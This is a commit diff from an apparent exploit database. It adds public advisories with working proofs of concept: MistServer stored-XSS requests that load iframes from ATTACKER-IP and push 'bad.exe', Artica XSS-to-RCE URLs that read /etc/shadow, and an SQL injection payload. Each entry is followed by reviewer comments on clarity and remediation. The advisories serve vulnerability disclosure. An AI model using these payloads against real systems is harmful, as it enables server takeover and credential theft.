DB: 2017-12-02
8 changes to exploits/shellcodes

6 new exploits/shellcodes

Abyss Web Server < 2.11.6 - Heap Memory Corruption
HP iMC Plat 7.2 - Remote Code Execution
HP iMC Plat 7.2 - Remote Code Execution (2)
Kodi 15 - Web Interface Arbitrary File Access (
Kodi 15 - Web Interface Arbitrary File Access
Jobs2Careers / Coroflot Clone - SQL Injection
MistServer 2.12 - Cross-Site Scripting
Artica Web Proxy 3.06 - Remote Code Execution
Offensive Security committed Dec 2, 2017
1 parent a24ecf7 commit bb8b231
Showing 9 changed files with 596 additions and 4 deletions.
3 changes: 2 additions & 1 deletion exploits/linux/dos/43199.c
@@ -1,6 +1,7 @@
// EDB Note: Source ~ https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0
// EDB Note: Source ~ https://github.com/bindecy/HugeDirtyCowPOC
// Author Note: Before running, make sure to set transparent huge pages to "always": `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled`
// Author Note: Before running, make sure to set transparent huge pages to "always":
// `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled`
//

//
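Review bot: Splitting the Author Note in the 43199.c header into two comment lines is a pure reformatting and reads cleaner, but the note still tells the reader to switch transparent huge pages to `always` system-wide without saying how to undo it. Since the second new line now carries the bare `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled` command, add a matching line that records the prior value (`cat /sys/kernel/mm/transparent_hugepage/enabled`) and restores it after testing, so a lab machine is not left in a non-default THP mode once the proof of concept has been run.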
3 changes: 1 addition & 2 deletions exploits/linux/webapps/38833.txt
@@ -3,8 +3,7 @@
# Date: 25-11-2015
# Contact: https://twitter.com/mpronk89
# Software Link: http://kodi.tv/
# Original report:
http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
# Original report: http://forum.kodi.tv/showthread.php?tid=144110&pid=2170305#pid2170305
# Version: v15
# Tested on: linux
# CVE : n/a
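Review bot: Joining `# Original report:` with its URL onto one line fixes the only header in 38833.txt that was split across two lines and matches the `# Field: value` form of the surrounding block. While this header is being touched, the neighbouring context line `# CVE : n/a` has a stray space before the colon that none of the other fields have; `# CVE: n/a` would keep the block consistent and easier to parse mechanically.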
94 changes: 94 additions & 0 deletions exploits/multiple/webapps/43205.txt
@@ -0,0 +1,94 @@
[+] Credits: John Page (aka Hyp3rlinX)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MIST-SERVER-v2.12-UNAUTHENTICATED-PERSISTENT-XSS-CVE-2017-16884.txt
[+] ISR: ApparitionSec



Vendor:
=============
mistserver.org



Product:
===========
MistServer v2.12


MistServer is a full-featured, next-generation streaming media toolkit for OTT (internet streaming).



Vulnerability Type:
===================
Unauthenticated Persistent XSS



CVE Reference:
==============
CVE-2017-16884



Security Issue:
================
Unauthenticated remote attackers can inject persistent XSS payloads by making failed HTTP authentication requests. Attacker supplied payloads will
get stored in the server logs as failed authentication requests alerts. Mistserver echoes back the unsanitized payloads in Mist Servers Web interface
automatically due to automatic refresh of the UI every few seconds, thereby, executing arbitrary attacker supplied code.



References:
============
https://news.mistserver.org/news/78/Stable+release+2.13+now+available%21



Exploit/POC:
=============
import requests

#INJECT IFRAME
requests.get('http://VICTIM-IP:4242/admin/api?callback=&command={"authorize":{"password":"666","username":"<iframe src=\'http://ATTACKER-IP\'></iframe>"}}')

#PUSH MALWARE
requests.get('http://VICTIM-IP:4242/admin/api?callback=&command={"authorize":{"password":"666","username":"<iframe src=\'http://ATTACKER-IP/bad.exe\'></iframe>"}}')

#EXFIL LOGS
requests.get('http://VICTIM-IP:4242/admin/api?command={"authorize":{"password":"666","username":"<script>alert(document.body.innerHTML)</script>"}}')



Network Access:
===============
Remote




Severity:
=========
High



Disclosure Timeline:
=============================
Vendor Notification: October 19, 2017
Vendor Acknowledgement : October 20, 2017
Vendor Released Fix : November 30, 2017
December 1, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
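Review bot: The new advisory 43205.txt never states the fixed version explicitly; a reader has to infer it from the 2.13 release link under References and the "Vendor Released Fix : November 30, 2017" timeline entry. Add an explicit affected/fixed line (Affected: 2.12, Fixed: 2.13) next to the Product field. The Security Issue paragraph would also be clearer if it named the root cause directly: the admin UI renders failed-authentication log entries, including the attacker-controlled `username` value, as HTML without output encoding, so the remediation is escaping that field when it is rendered, and limiting who can reach the admin port 4242 is the interim mitigation. Minor: "Mistserver" and "Mist Servers" are spelled inconsistently with the Product line's "MistServer".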
37 changes: 37 additions & 0 deletions exploits/php/webapps/43203.txt
@@ -0,0 +1,37 @@
# Exploit Title: Jobs2Careers / Coroflot Clone - SQL Injection
# Date: 2017-11-30
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.i-netsolution.com/
# Software Link: http://www.i-netsolution.com/product/jobs2careers-coroflot-jobs-clone-script/
# Version: 30 November 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.13.1]
# Email: [email protected]
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-11-30

Product & Service Introduction:
===============================
Our readymade PHP job site script make your own job portal website set in motion.

Technical Details & Description:
================================

SQL injection on [keyword] parameter.

Proof of Concept (PoC):
=======================

SQLi:

https://localhost/[path]/onlinejobsearch/job

Parameter: keyword (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: keyword=xxxx') AND (SELECT 6727 FROM(SELECT COUNT(*),CONCAT(0x7176707a71,(SELECT (ELT(6727=6727,1))),0x7178627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('zImA'='zImA&location_name[]=

==================
8bitsec - [https://twitter.com/_8bitsec]
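Review bot: 43203.txt gives no disclosure timeline or vendor response, so it is unclear whether i-netsolution was notified or whether a fixed build exists; a Disclosure Timeline block like the ones in the other advisories in this commit would settle that. The `# Version: 30 November 17` field holds a date rather than a product version, and `# Date` and `Release Date` duplicate each other. The PoC also sends `location_name[]=` alongside `keyword` without the text saying whether that parameter is required for the error-based technique to work; either drop it from the payload or explain why it is there. The remediation (binding the `keyword` value with a parameterised query in the job search handler) is not stated and should be.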
90 changes: 90 additions & 0 deletions exploits/php/webapps/43206.txt
@@ -0,0 +1,90 @@
[+] Credits: John Page (aka Hyp3rlinX)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ARTICA-WEB-PROXY-v3.06-REMOTE-CODE-EXECUTION-CVE-2017-17055.txt
[+] ISR: ApparitionSec



Vendor:
=======
www.articatech.com



Product:
=========
Artica Web Proxy v.3.06.112216


Artica Tech offers a powerful but easy-to-use Enterprise-Class Web Security and Control solution,
usually the preserve of large companies. ARTICA PROXY Solutions have been developed over the past
10 years as an Open Source Project to help SMEs and public bodies protect both their organizations
and employees from risks posed by the Internet.



Vulnerability Type:
===================
Remote Code Execution



CVE Reference:
==============
CVE-2017-17055



Security Issue:
================
Artica offers a web based command line emulator 'system.terminal.php' (shell), allowing authenticated users to execute OS commands as root.
However, artica fails to sanitize the following HTTP request parameter $_GET["username-form-id"] used in 'freeradius.users.php'.

Therefore, authenticated users who click an attacker supplied link or visit a malicious webpage, can result in execution of attacker
supplied Javascript code. Which is then used to execute unauthorized Operating System Commands (RCE) on the affected Artica Web Proxy Server
abusing the system.terminal.php functionality. Result is attacker takeover of the artica server.



Exploit/POC:
=============
1) Steal artica Server "/etc/shadow" password file.

https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=cat%20/etc/shadow%27);%3C%2Fscript%3E%3Cscript%3E

2) Write file 'PWN' to /tmp dir.

https://VICTIM-IP:9000/freeradius.users.php?username-form-id=%3C%2Fscript%3E%3Cscript%3Evar%20xhr=new%20XMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27POST%27,%27https://VICTIM-IP:9000/system.terminal.php%27,true);xhr.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);xhr.send(%27cmdline=touch%20/tmp/PWN%27);%3C%2Fscript%3E%3Cscript%3E


Network Access:
===============
Remote




Severity:
=========
High



Disclosure Timeline:
=============================
Vendor Notification: November 28, 2017
Vendor Confirms Vulnerability : November 28, 2017
Vendor Reply "Fixed in 3.06.112911 / ISO released" : November 29, 2017
December 1, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
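Review bot: The Vulnerability Type in 43206.txt is labelled "Remote Code Execution", but the Security Issue section describes reflected XSS in the `username-form-id` parameter of freeradius.users.php that needs an already-authenticated user to open an attacker link; the command execution itself comes from the legitimate system.terminal.php feature. State that precondition (authenticated victim interaction) alongside the High severity so readers can weigh it correctly. The PoC's POST to system.terminal.php carries only `cmdline=...` and no anti-CSRF token, which is the second weakness enabling the chain and deserves its own sentence in the Security Issue section. The fixed version 3.06.112911 appears only inside the quoted vendor reply in the timeline; add an explicit "Fixed in" line next to the Product version, and the Product line's "v.3.06.112216" should use the same form as the title's "3.06".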